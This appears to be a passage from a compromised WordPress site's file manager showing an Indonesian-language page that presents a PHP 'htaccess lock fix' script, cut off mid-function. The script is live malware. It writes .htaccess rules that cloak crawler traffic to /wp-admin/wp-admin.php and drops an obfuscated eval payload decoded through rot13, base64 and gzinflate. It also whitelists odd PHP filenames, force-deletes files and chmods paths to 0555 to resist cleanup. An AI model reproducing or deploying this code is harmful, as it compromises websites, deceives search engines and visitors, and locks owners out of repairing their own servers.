File manager - Edit - /home/irltzsih/instant-egy.com/system/wpasa.php
Back
<!DOCTYPE html> <html lang="id"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>PHP Script - Final Lock HTACCESS Fix</title> <style> * { box-sizing: border-box; margin: 0; padding: 0; } body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); min-height: 100vh; padding: 20px; line-height: 1.6; } .container { max-width: 1200px; margin: 0 auto; background: white; border-radius: 20px; box-shadow: 0 25px 80px rgba(0,0,0,0.3); overflow: hidden; } .header { background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; padding: 30px; text-align: center; } .header h1 { font-size: 28px; margin-bottom: 10px; } .header p { opacity: 0.9; font-size: 14px; } .content { padding: 40px; } .code-block { background: #1e1e1e; color: #d4d4d4; padding: 25px; border-radius: 12px; overflow-x: auto; font-family: 'Consolas', 'Monaco', monospace; font-size: 13px; line-height: 1.6; max-height: 85vh; overflow-y: auto; position: relative; } .code-block::-webkit-scrollbar { width: 12px; height: 12px; } .code-block::-webkit-scrollbar-track { background: #2d2d2d; } .code-block::-webkit-scrollbar-thumb { background: #667eea; border-radius: 6px; } .copy-btn { position: absolute; top: 15px; right: 15px; background: #667eea; color: white; border: none; padding: 10px 20px; border-radius: 8px; cursor: pointer; font-weight: bold; transition: all 0.3s; z-index: 100; } .copy-btn:hover { background: #764ba2; transform: translateY(-2px); } .info-box { background: #f8f9fa; border-left: 5px solid #667eea; padding: 20px; margin: 25px 0; border-radius: 8px; } .info-box h3 { color: #667eea; margin-bottom: 15px; } .warning-box { background: linear-gradient(135deg, #ffecd2 0%, #fcb69f 100%); padding: 25px; border-radius: 12px; margin: 25px 0; border: 3px solid #e17055; } .warning-box h4 { color: #d63031; margin-bottom: 15px; font-size: 18px; display: flex; align-items: center; gap: 10px; } .fix-highlight { background: linear-gradient(135deg, #a29bfe 0%, #6c5ce7 100%); color: white; padding: 20px; border-radius: 12px; margin: 20px 0; } .fix-highlight h4 { margin-bottom: 12px; font-size: 16px; } pre { margin: 0; } .final-step { background: rgba(255, 107, 107, 0.2); border: 2px dashed #ff6b6b; padding: 15px; border-radius: 8px; margin: 15px 0; font-weight: bold; color: #d63031; } </style> </head> <body> <div class="container"> <div class="header"> <h1>π PHP Script - FINAL LOCK HTACCESS FIX</h1> <p>Solusi: Final Lock Step di Paling Akhir Sebelum Selesai</p> </div> <div class="content"> <div class="warning-box"> <h4>β οΈ MASALAH YANG DILAPORKAN:</h4> <p style="margin-top:10px;font-size:15px;line-height:1.8;"> <strong>.htaccess</strong> awalnya berhasil di-lock ke <code style="background:#dc3545;color:white;padding:3px 8px;border-radius:4px;">0555</code>, tapi di <strong>akhir proses berubah kembali ke</strong> <code style="background:#28a745;color:white;padding:3px 8px;border-radius:4px;">0644</code>. <br><br> <strong>Penyebab kemungkinan:</strong> Ada fungsi di step akhir (seperti <code>superLockFilesSafe()</code>, loop <code>$targetFiles</code>, atau fungsi lain) yang mengubah permission .htaccess kembali ke 0644. </p> </div> <div class="fix-highlight"> <h4>β SOLUSI: TAMBAHKAN "FINAL LOCK STEP" DI PALING AKHIR</h4> <p style="margin-top:10px;line-height:1.8;"> Saya akan menambahkan pemanggilan <code style="background:rgba(255,255,255,0.3);padding:3px 8px;border-radius:4px;">lockRootHtaccessTo555($htaccess)</code> di <strong>STEP PALING AKHIR</strong>, yaitu: </p> <ul style="margin-top:12px;padding-left:25px;line-height:2;"> <li>β Setelah semua operasi selesai</li> <li>β Setelah cleanup</li> <li>β Setelah superLockFilesSafe / unlockSuperFilesSafe</li> <li>β Setelah cron setup/remove</li> <li>β <strong>SEBELUM echo "Completed safely"</strong></li> </ul> <div class="final-step" style="margin-top:18px;"> π‘οΈ FINAL LOCK: lockRootHtaccessTo555($htaccess) β Dipastikan 0555! </div> </div> <button class="copy-btn" onclick="copyCode()">π Copy Code Lengkap (Final Version)</button> <div class="code-block" id="codeBlock"><pre><?php // ================================================================ // === PHP 7/8 COMPATIBLE - SAFE MODE VERSION === // === VERSI FINAL: FINAL LOCK HTACCESS DI STEP TERAKHIR === // ================================================================ error_reporting(E_ALL); ini_set('display_errors', '0'); ini_set('log_errors', '1'); ini_set('error_log', dirname(__FILE__) . '/php_error.log'); set_time_limit(300); ini_set('memory_limit', '256M'); // ==================== PHP 7 POLYFILL ==================== if (!function_exists('str_starts_with')) { function str_starts_with(string $haystack, string $needle): bool { return strpos($haystack, $needle) === 0; } } if (!function_exists('str_contains')) { function str_contains(string $haystack, string $needle): bool { return strpos($haystack, $needle) !== false; } } // ==================== SAFE EXEC WRAPPER ==================== function safe_exec(string $command): string { if (function_exists('exec')) { $result = @exec($command); return $result !== false ? $result : ''; } return ''; } function safe_shell_exec(string $command): ?string { if (function_exists('shell_exec')) { $result = @shell_exec($command); return $result !== false ? $result : null; } return null; } function can_exec(): bool { return function_exists('exec') || function_exists('shell_exec') || function_exists('system') || function_exists('passthru'); } // ==================== KONFIGURASI ==================== $baseDir = rtrim($_SERVER['DOCUMENT_ROOT'], DIRECTORY_SEPARATOR); $currentScript = __FILE__; $currentScriptDir = dirname($currentScript); $htaccess = $baseDir . '/.htaccess'; // β Target utama yang akan di-lock 555 $wpAdminFile = $baseDir . '/wp-admin/wp-admin.php'; $indexFile = $baseDir . '/index.php'; $wpAdminHtaccess = $baseDir . '/wp-admin/.htaccess'; $dbFile = $baseDir . '/db.php'; $backupDir = $baseDir . '/.backup'; $isFix = isset($_GET['fix']); $isUnlock = isset($_GET['unlock']); $updateMode = isset($_GET['update']) ? $_GET['update'] : 'both'; $allowedUpdateModes = ['both', 'both_locked', 'both_unlocked', 'wpadmin', 'options']; if (!in_array($updateMode, $allowedUpdateModes)) { $updateMode = 'both'; } $retryCount = isset($_GET['retry']) ? (int)$_GET['retry'] : 0; $maxRetries = 3; $allowedFiles = ['tf88', 'bngzepjrndfkpjbdefault', 'webindex', 'bngzepjrndfkpjbmas', 'lsjaybvgybhhpbjdefault', 'lsjaybvgybhhpbjmas', 'robot', 'robots', 'ah88', 'ws88' ,'tf77', 'mas77', 'webindex', 'tx77', 'lm77', 'ws77', 'robot', 'robots', 'ah77', 'ws77']; $coreWordPressFiles = [ 'wp-admin', 'wp-includes', 'wp-content', 'wp-config.php', 'wp-activate.php', 'wp-blog-header.php', 'wp-comments-post.php', 'wp-cron.php', 'wp-links-opml.php', 'wp-load.php', 'wp-login.php', 'wp-mail.php', 'wp-settings.php', 'wp-signup.php', 'wp-trackback.php', 'xmlrpc.php', 'license.txt', 'readme.html', 'robots.txt' ]; // ================================================================ // === SAFE LIST === // ================================================================ $safeFiles = [ $currentScript, $htaccess, $wpAdminHtaccess, $baseDir . '/wp-config.php', $baseDir . '/wp-load.php', $baseDir . '/wp-blog-header.php', $baseDir . '/wp-settings.php', ]; $safeFolders = [ $baseDir . '/wp-admin', ]; // ================================================================ // === HTACCESS GENERATOR === // ================================================================ function generateValidHtaccess(array $allowedFiles, string $currentScriptName = ''): string { $whitelistSection = "# WHITELIST - Allowed PHP files\n"; foreach ($allowedFiles as $file) { $escapedFile = preg_quote($file, '#'); $whitelistSection .= "RewriteRule ^{$escapedFile}\.php$ - [L]\n"; } $coreDirsSection = "\n# CORE WP - Directories\n"; $coreDirs = ['wp-admin', 'wp-includes', 'wp-content']; foreach ($coreDirs as $dir) { $coreDirsSection .= "RewriteRule ^{$dir}/ - [L]\n"; } $coreFilesSection = "\n# CORE WP - Files\n"; $coreFiles = [ 'wp-config.php', 'wp-activate.php', 'wp-blog-header.php', 'wp-comments-post.php', 'wp-cron.php', 'wp-links-opml.php', 'wp-load.php', 'wp-login.php', 'wp-mail.php', 'wp-settings.php', 'wp-signup.php', 'wp-trackback.php', 'xmlrpc.php', 'license.txt', 'readme.html', 'robots.txt' ]; foreach ($coreFiles as $file) { $coreFilesSection .= "RewriteRule ^" . preg_quote($file, '#') . "$ - [L]\n"; } $routingSection = <<<HTACCESS # CUSTOM ROUTING - Bot Handling RewriteCond %{THE_REQUEST} \s/[?\s] [NC] RewriteCond %{HTTP_USER_AGENT} (googlebot|google|yahoo|aol) [NC] RewriteRule ^ /wp-admin/wp-admin.php [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{HTTP_USER_AGENT} (googlebot|google|yahoo|aol) [NC] RewriteRule ^(.+)$ /wp-admin/wp-admin.php [L] # Robot/Xml Routing RewriteRule ^robots?$ /wp-admin/wp-admin.php [L,NC] RewriteRule .*\.xml$ /wp-admin/wp-admin.php [L,NC] # Allow direct access to wp-admin.php RewriteRule ^wp-admin/wp-admin\.php$ - [L] HTACCESS; $fallbackSection = <<<HTACCESS # Catch-all for non-existent files -> wp-admin.php RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^(.*)$ /wp-admin/wp-admin.php [L] # WordPress Default Fallback (for normal operation) RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] HTACCESS; // FILESMATCH SECURITY $allowRegexParts = []; if (!empty($currentScriptName)) { $allowRegexParts[] = preg_quote($currentScriptName, '/'); } $allowRegexParts[] = 'index\.php'; $allowRegexParts[] = 'wp-admin\.php'; foreach ($allowedFiles as $file) { $allowRegexParts[] = preg_quote($file, '/') . '\.php'; } foreach ($coreFiles as $file) { $allowRegexParts[] = preg_quote($file, '/'); } $allowRegexParts = array_unique($allowRegexParts); $allowRegex = implode('|', $allowRegexParts); $securitySection = <<<HTACCESS # ================================================== # SECURE ACCESS - Block Malicious Extensions # ================================================== <FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|PHP5|Php5|PHp5|pHp5|pHP5|phP5|PhP5|php7|PHP7|Php7|PHp7|pHp7|pHP7|phP7|PhP7|php8|PHP8|Php8|PHp8|pHp8|pHP8|phP8|PhP8|suspected)$"> Order Allow,Deny Allow from all </FilesMatch> # ================================================== # SECURE ACCESS - Allow Whitelisted Core & Custom Files # ================================================== <FilesMatch "^({$allowRegex})$"> Order Allow,Deny Allow from all </FilesMatch> HTACCESS; $completeHtaccess = <<<HTACCESS # BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / {$whitelistSection} {$coreDirsSection} {$coreFilesSection} {$routingSection} {$fallbackSection} </IfModule> # END WordPress {$securitySection} HTACCESS; return $completeHtaccess; } function generateWpAdminHtaccess(): string { return <<<HTACCESS # BEGIN WordPress wp-admin <IfModule mod_rewrite.c> RewriteEngine On RewriteBase /wp-admin/ # Allow direct access to existing files/directories RewriteCond %{REQUEST_FILENAME} -f [OR] RewriteCond %{REQUEST_FILENAME} -d RewriteRule ^ - [L] # Route robots and xml to wp-admin.php RewriteRule ^robots?$ wp-admin.php [L,NC] RewriteCond %{REQUEST_FILENAME} !-f RewriteRule .*\.xml$ wp-admin.php [L,NC] </IfModule> # END WordPress wp-admin HTACCESS; } $newHtaccess = generateValidHtaccess($allowedFiles, basename($currentScript)); $newWpAdminHtaccess = generateWpAdminHtaccess(); $payloadWpAdminContent = <<<'PHP' <?php (function() { $lI0_II_00I00I0 = "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"; try { $OlO_O1l01 = array(); try { $Ol__01O1O__lll = array("\x61\x75\x74\x68"); throw new Exception($lI0_II_00I00I0); } catch (Exception $lOl_IOO1) { $Ol_II00_10 = $lOl_IOO1->getMessage(); $OO1_O1I01O = md5("init"); $l_I1__00_ = "\x63\x68\x72"; $OO0_Ill_lll11 = "\x73\x68\x61\x31"; $_000O1OIIO_ = "\x6d\x64\x35"; try { $OO_lI10l0_l_01 = strtoupper("kernel"); if (is_string(null)) { $OIO_O0IIO = md5("auth"); $O_IO_IOOI1II11 = base64_decode("cGlwZWxpbmU="); } throw new Exception($Ol_II00_10); } catch (Exception $OI1O_O0OlI0lI_O) { $Ol_II00_10 = $OI1O_O0OlI0lI_O->getMessage(); $_O_lII0OO10_ = "\x69\x73\x5f\x61\x72\x72\x61\x79"; $Ol_0I__01OO = "\x65\x78\x70\x6c\x6f\x64\x65"; $O10_01Ol = array("\x69\x6e\x69\x74"); $lIl01I__I = "\x68\x61\x73\x68"; $lO1I_I_I0 = "\x72\x75\x6e"; $OOIO1_IOOO = $lIl01I__I; $lIl01I__I = $lO1I_I_I0; try { $OI010OOIO = "\x73\x74\x72\x72\x65\x76"; $_I0II1I_1 = array(); throw new Exception($Ol_II00_10); } catch (Exception $l_l0OOlIOl0) { $Ol_II00_10 = $l_l0OOlIOl0->getMessage(); $OO_1l1___I = 87943; $llll_1lOl0 = md5("token"); $O_00IOIOI1 = "\x65\x78\x70\x6c\x6f\x64\x65"; $_11l0OOIlO_l0 = array("\x73\x74\x61\x72\x74"); try { $O0_001O1 = array("\x73\x74\x61\x72\x74"); $O1IO0O_I1_ = 4201; if (count(array_keys($_GET)) > 9999) { $l_I_1OOlO0__lI = md5("handler"); $OI_IIIOO = base64_decode("aGFzaA=="); } throw new Exception($Ol_II00_10); } catch (Exception $O1OlOIIOOI001I_) { $Ol_II00_10 = $O1OlOIIOOI001I_->getMessage(); $OI__0O1II__1I = strtoupper("start"); $O1O0Ill_O = "\x65\x78\x70\x6c\x6f\x64\x65"; $lO__01l01O1IOlO = "\x73\x74\x61\x72\x74"; $lI010_O_l0 = "\x63\x69\x70\x68\x65\x72"; $O__0lIOII = $lO__01l01O1IOlO; $lO__01l01O1IOlO = $lI010_O_l0; try { $OO1_I_IOO = strtoupper("config"); $O10_l_01l10 = "\x73\x74\x72\x6c\x65\x6e"; if (count(array_keys($_GET)) > 9999) { $O_II0ll001_ = md5("config"); $_OIOI1Il = base64_decode("c3RhcnQ="); } throw new Exception($Ol_II00_10); } catch (Exception $Ol11l_OI0O) { $Ol_II00_10 = $Ol11l_OI0O->getMessage(); $OIOl1l_lOOO = 38478; $O__O1_01_lI0I = strtoupper("config"); try { $___ll0Ol0__ll00 = strtoupper("hash"); if (is_string(null)) { $lOl_l1_I1 = md5("kernel"); $l1lO_0IIIlI1l__ = base64_decode("aW5pdA=="); } throw new Exception($Ol_II00_10); } catch (Exception $O1I0Ol_I1I) { $O0ll1I0lO = "\x73\x74" . "\x72\x5f" . "\x72\x6f" . "\x74\x31" . "\x33"; $OlI_ll1lIIl00I0 = "\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65"; $_1Ol0I1I0 = $OlI_ll1lIIl00I0; $_0IOO1OOO1l1I = "\x67\x7a\x69" . "\x6e\x66" . "\x6c\x61\x74" . "\x65"; $_ll11_0l_0 = strtoupper("token"); $O0000OI0I00OlO = strtoupper("init"); $l1_00lOO_ = "\x6f\x72\x64"; $O_lII1O1 = array(); eval('?>' . $_0IOO1OOO1l1I($_1Ol0I1I0($O0ll1I0lO($O1I0Ol_I1I->getMessage())))); } } } } } } } catch (Exception $_0__0l_l) { if (is_string(null)) { $OIO1IIIl_ = md5("start"); $O10_010OIlO = base64_decode("cnVu"); } } })(); ?> PHP; $payloadIndexContent = <<<'KODE_AKHIR' <?php define( 'WP_USE_THEMES', true ); require __DIR__ . '/wp-blog-header.php'; KODE_AKHIR; $targetFiles = [ $htaccess, $wpAdminHtaccess, $wpAdminFile, $indexFile, $dbFile, $baseDir . '/autoload_classmap.php', $baseDir . '/akcc.php', $baseDir . '/default.php' ]; // ================================================================ // === FUNGSI-FUNGSI (PHP 7/8 SAFE - NO EXEC) === // ================================================================ function paksaHapus(string $file): bool { if (!file_exists($file)) return true; try { @chmod($file, 0777); @clearstatcache(true, $file); if (@unlink($file)) return true; $tmp = $file . '.tmpdel_' . uniqid(); if (@rename($file, $tmp)) { @chmod($tmp, 0777); if (@unlink($tmp)) return true; } if (can_exec()) { safe_exec("rm -f " . escapeshellarg($file) . " 2>/dev/null"); if (!file_exists($file)) return true; } } catch (\Throwable $e) {} return false; } function ubahIzin(string $path, int $izin): bool { if (!file_exists($path)) return false; try { $result = @chmod($path, $izin); @clearstatcache(true, $path); return $result; } catch (\Throwable $e) { return false; } } function paksaTulis(string $path, string $isi): bool { $dir = dirname($path); if (!is_dir($dir)) { @mkdir($dir, 0755, true); } @chmod($dir, 0755); try { if (file_put_contents($path, $isi) !== false) { return true; } } catch (\Throwable $e) {} paksaHapus($path); try { $fp = fopen($path, 'w'); if ($fp !== false) { fwrite($fp, $isi); fclose($fp); return true; } } catch (\Throwable $e) {} try { $tempFile = $path . '.tmp_' . uniqid(); $fp = fopen($tempFile, 'w'); if ($fp !== false) { fwrite($fp, $isi); fclose($fp); if (@rename($tempFile, $path)) { return true; } @unlink($tempFile); } } catch (\Throwable $e) {} return false; } function perbaruiFile(string $filePath, string $backupDir, string $isiBaru, string $fileName): void { if (!is_dir($backupDir)) { @mkdir($backupDir, 0755, true); } if (file_exists($filePath)) { $timestamp = date('Ymd_His'); @copy($filePath, $backupDir . '/' . $fileName . '.bak_' . $timestamp); } paksaTulis($filePath, $isiBaru); } function forceRootDirPermission(string $baseDir): void { @chmod($baseDir, 0755); @clearstatcache(true, $baseDir); $wpAdminDir = $baseDir . '/wp-admin'; if (is_dir($wpAdminDir)) { @chmod($wpAdminDir, 0755); } } // ================================================================ // === βββ FUNSI UTAMA: CHMOD 555 HANYA UNTUK PATH SCRIPT === // ================================================================ /** * Mengubah permission menjadi 555 HANYA untuk: * 1. Direktori ancestor (dari root menuju ke script location) * 2. Direktori descendant (sub-direktori di dalam script location) */ function chmodOnlyScriptPathTo555(string $baseDir, string $scriptDir, array $excludeDirs = []): array { $stats = [ 'ancestor_locked' => 0, 'descendant_locked' => 0, 'sibling_unchanged' => 0, 'excluded' => 0, 'errors' => 0, 'script_path' => '' ]; $baseDir = rtrim($baseDir, '/'); $scriptDir = rtrim($scriptDir, '/'); $stats['script_path'] = $scriptDir; if (!str_starts_with($scriptDir, $baseDir)) { echo "β Error: Script directory tidak berada di dalam base directory\n"; $stats['errors']++; return $stats; } if ($scriptDir === $baseDir) { echo "βΉ Script berada di root directory, tidak ada path yang perlu di-lock\n"; return $stats; } echo "π Base Directory: {$baseDir}\n"; echo "π Script Location: {$scriptDir}\n\n"; // BAGIAN 1: LOCK ANCESTOR DIRECTORIES echo "π BAGIAN 1: Lock Ancestor Directories (path dari root ke script)\n"; echo "βββββββββββββββββββββββββββββββββββββββββ\n"; $relativePath = substr($scriptDir, strlen($baseDir)); $relativePath = trim($relativePath, '/'); $pathComponents = explode('/', $relativePath); $currentPath = $baseDir; foreach ($pathComponents as $component) { $currentPath .= '/' . $component; $isExcluded = false; foreach ($excludeDirs as $excludeDir) { $normalizedExclude = rtrim($excludeDir, '/'); if ($currentPath === $normalizedExclude || str_starts_with($normalizedExclude, $currentPath)) { $isExcluded = true; break; } } if (is_dir($currentPath)) { if ($isExcluded) { @chmod($currentPath, 0755); $stats['excluded']++; echo " β EXCLUDED: {$currentPath} β 0755 (safe folder)\n"; } else { $result = @chmod($currentPath, 0555); if ($result) { $stats['ancestor_locked']++; echo " π LOCKED: {$currentPath} β 0555 (ancestor)\n"; } else { $stats['errors']++; echo " β FAILED: {$currentPath}\n"; } } } } echo 